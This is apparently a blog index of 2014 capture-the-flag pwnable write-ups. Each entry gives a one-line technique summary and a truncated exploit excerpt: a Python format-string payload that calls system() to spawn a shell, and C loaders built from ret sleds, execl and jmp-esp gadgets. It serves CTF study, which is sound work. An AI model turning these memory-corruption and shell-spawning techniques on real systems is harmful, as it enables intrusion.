CTF/2014

· CTF/2014
Category : Pwnables
Summary : make chdir() fail, get admin password, 13-byte fsb
Exploit
#!/usr/bin/python
from socket import *
from struct import pack,unpack
p = lambda x:pack("value")
num = ((stack&0x0000ffff) - 4)-926
payload = ""
payload += p(system_addr)
payload += "aaaa"
payload += p(system_arg)
s.send("4\n")
s.recv(1024)
s.send("1\n")
s.recv(1024)
s.send("admin\x00"+payload+"\x00\x00\x00\x00/bin/s..
· CTF/2014
Category : Pwnables
Summary : overwrite function pointer in heap by heap overflow or use-after-free, lift esp + ret sledding
loader.c
#include
#define RET "\x37\x93\x04\x08"
#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET
#define EXECL "\x40\x2e\x0f\x40"
//#define EXECL "\x50\x24\x0f\x40"
#define BINARY "\x74\x81\x04..
· CTF/2014
Category : Pwnables
Summary : clear game, overwrite any 4-byte memory except 0x0804XXXX, _exit calls %gs + 0x14, lift esp + ret sledding
loader.c
#include
#define RET "\x20\x99\x04\x08" // 0x08049920 retn
#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET
#define JMPESP "\x7d\x2a\x08\x40" // 0x40082a7d: jmp *%esp
#defi..
pwn3r_45
List of posts in the 'CTF/2014' category